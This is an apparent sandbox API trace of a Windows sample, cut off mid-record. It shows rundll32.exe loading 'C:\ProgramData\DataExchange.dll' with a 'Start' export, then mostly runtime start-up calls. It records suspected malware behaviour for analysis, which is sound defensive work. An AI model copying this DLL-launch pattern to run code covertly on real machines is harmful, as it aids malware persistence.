GetProcessHeap () returned 0x360000 [0215.034] HeapValidate (hHeap=0x360000, dwFlags=0x0, lpMem=0x37b770) returned 1 [0215.034] GetProcessHeap () returned 0x360000 [0215.034] RtlSizeHeap (HeapHandle=0x360000, Flags=0x0, MemoryPointer=0x37b770) returned 0x18 [0215.034] HeapFree (in: hHeap=0x360000, dwFlags=0x0, lpMem=0x37b770 | out: hHeap=0x360000) returned 1 [0215.034] exit (_Code=0) Process: id = "5" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x3a0000" os_pid = "0x958" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x988" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\ProgramData\\DataExchange.dll Start " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 56 os_tid = 0x324 Process: id = "6" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x2f654000" os_pid = "0x748" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x958" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" C:\\ProgramData\\DataExchange.dll Start " cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\" os_username = "YKYD69Q\\aETAdzjz" bitness = "32" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f18d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 58 os_tid = 0x538 [0265.951] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.951] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.951] GetLastError () returned 0x57 [0265.951] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.951] GetLastError () returned 0x57 [0265.951] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x75b90000 [0265.952] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeCriticalSectionEx") returned 0x75ba4d28 [0265.952] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.952] GetLastError () returned 0x57 [0265.952] GetProcAddress (hModule=0x75b90000, lpProcName="FlsAlloc") returned 0x75ba4f2b [0265.952] GetProcAddress (hModule=0x75b90000, lpProcName="FlsSetValue") returned 0x75ba4208 [0265.954] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.954] GetLastError () returned 0x57 [0265.954] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.954] GetLastError () returned 0x57 [0265.954] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x75b90000 [0265.954] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeCriticalSectionEx") returned 0x75ba4d28 [0265.955] GetProcessHeap () returned 0x680000 [0265.955] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.955] GetLastError () returned 0x57 [0265.955] GetProcAddress (hModule=0x75b90000, lpProcName="FlsAlloc") returned 0x75ba4f2b [0265.955] GetLastError () returned 0x57 [0265.955] GetProcAddress (hModule=0x75b90000, lpProcName="FlsGetValue") returned 0x75ba1252 [0265.956] GetProcAddress (hModule=0x75b90000, lpProcName="FlsSetValue") returned 0x75ba4208 [0265.956] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x364) returned 0x698430 [0265.956] SetLastError (dwErrCode=0x57) [0265.957] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0xc00) returned 0x6987a0 [0265.959] GetStartupInfoW (in: lpStartupInfo=0x2df644 | out: lpStartupInfo=0x2df644*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\rundll32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x754833a0, hStdOutput=0xce8270dd, hStdError=0xfffffffe)) [0265.959] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0265.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0265.959] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0265.959] GetCommandLineA () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\ProgramData\\DataExchange.dll Start " [0265.959] GetCommandLineW () returned="\"C:\\Windows\\system32\\rundll32.exe\" C:\\ProgramData\\DataExchange.dll Start " [0265.959] GetACP () returned 0x4e4 [0265.959] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x220) returned 0x69a3a8 [0265.959] IsValidCodePage (CodePage=0x4e4) returned 1 [0265.959] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2df668 | out: lpCPInfo=0x2df668) returned 1 [0265.960] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x2def30 | out: lpCPInfo=0x2def30) returned 1 [0265.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x2decc8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0265.960] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x2def44 | out: lpCharType=0x2def44) returned 1 [0265.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.960] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x2dec78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0265.960] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0265.960] GetLastError () returned 0x57 [0265.960] GetProcAddress (hModule=0x75b90000, lpProcName=0x754991c4) returned 0x75c247f1 [0265.960] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.961] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2dea68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0265.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x2df444, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ%îå»\x80ö-", lpUsedDefaultChar=0x0) returned 256 [0265.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0265.961] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2df544, cbMultiByte=256, lpWideCharStr=0x2dec98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0265.961] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0265.961] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchSrc=256, lpDestStr=0x2dea88, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0265.961] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x2df344, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ%îå»\x80ö-", lpUsedDefaultChar=0x0) returned 256 [0265.961] RtlInitializeSListHead (in: ListHead=0x754a93d8 | out: ListHead=0x754a93d8) [0265.961] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75b90000 [0265.961] GetProcAddress (hModule=0x75b90000, lpProcName="FlsAlloc") returned 0x75ba4f2b [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="FlsFree") returned 0x75ba359f [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="FlsGetValue") returned 0x75ba1252 [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="FlsSetValue") returned 0x75ba4208 [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeCriticalSectionEx") returned 0x75ba4d28 [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="InitOnceExecuteOnce") returned 0x75bbd627 [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="CreateEventExW") returned 0x75c2410b [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="CreateSemaphoreW") returned 0x75bbca5a [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="CreateSemaphoreExW") returned 0x75c24195 [0265.962] GetProcAddress (hModule=0x75b90000, lpProcName="CreateThreadpoolTimer") returned 0x75bbee7e [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="SetThreadpoolTimer") returned 0x77bf441c [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77c1c50e [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="CloseThreadpoolTimer") returned 0x77c1c381 [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="CreateThreadpoolWait") returned 0x75bbf088 [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="SetThreadpoolWait") returned 0x77c005d7 [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="CloseThreadpoolWait") returned 0x77c1ca24 [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="FlushProcessWriteBuffers") returned 0x77bd0b8c [0265.963] GetProcAddress (hModule=0x75b90000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77c8fde8 [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="GetCurrentProcessorNumber") returned 0x77c21e1d [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="CreateSymbolicLinkW") returned 0x75c1cd11 [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="GetCurrentPackageId") returned 0x0 [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="GetTickCount64") returned 0x75bbeee0 [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="GetFileInformationByHandleEx") returned 0x75bbc78f [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="SetFileInformationByHandle") returned 0x75bccbfc [0265.964] GetProcAddress (hModule=0x75b90000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeConditionVariable") returned 0x77be8456 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="WakeConditionVariable") returned 0x77c57de4 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="WakeAllConditionVariable") returned 0x77c1409d [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="SleepConditionVariableCS") returned 0x75c24b32 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeSRWLock") returned 0x77be8456 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="AcquireSRWLockExclusive") returned 0x77be29f1 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77bf4892 [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="ReleaseSRWLockExclusive") returned 0x77be29ab [0265.965] GetProcAddress (hModule=0x75b90000, lpProcName="SleepConditionVariableSRW") returned 0x75c24b74 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="CreateThreadpoolWork") returned 0x75bbee45 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="SubmitThreadpoolWork") returned 0x77c28491 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="CloseThreadpoolWork") returned 0x77c1d8e2 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="CompareStringEx") returned 0x75c246b1 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="GetLocaleInfoEx") returned 0x75c24751 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="LCMapStringEx") returned 0x75c247f1 [0265.966] GetModuleHandleW (lpModuleName="api-ms-win-core-synch-l1-2-0.dll") returned 0x0 [0265.966] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75b90000 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="InitializeConditionVariable") returned 0x77be8456 [0265.966] GetProcAddress (hModule=0x75b90000, lpProcName="SleepConditionVariableCS") returned 0x75c24b32 [0265.967] GetProcAddress (hModule=0x75b90000, lpProcName="WakeAllConditionVariable") returned 0x77c1409d [0265.967] RtlInitializeConditionVariable () returned 0x754a9070 [0265.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x69a5d0 [0265.967] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x800) returned 0x69a658 [0265.967] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0265.968] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x754a9608, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe")) returned 0x20 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x57) returned 0x69ae60 [0265.968] GetEnvironmentStringsW () returned 0x69aec0* [0265.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1509, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1509 [0265.968] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5e5) returned 0x69ba98 [0265.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1509, lpMultiByteStr=0x69ba98, cbMultiByte=1509, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 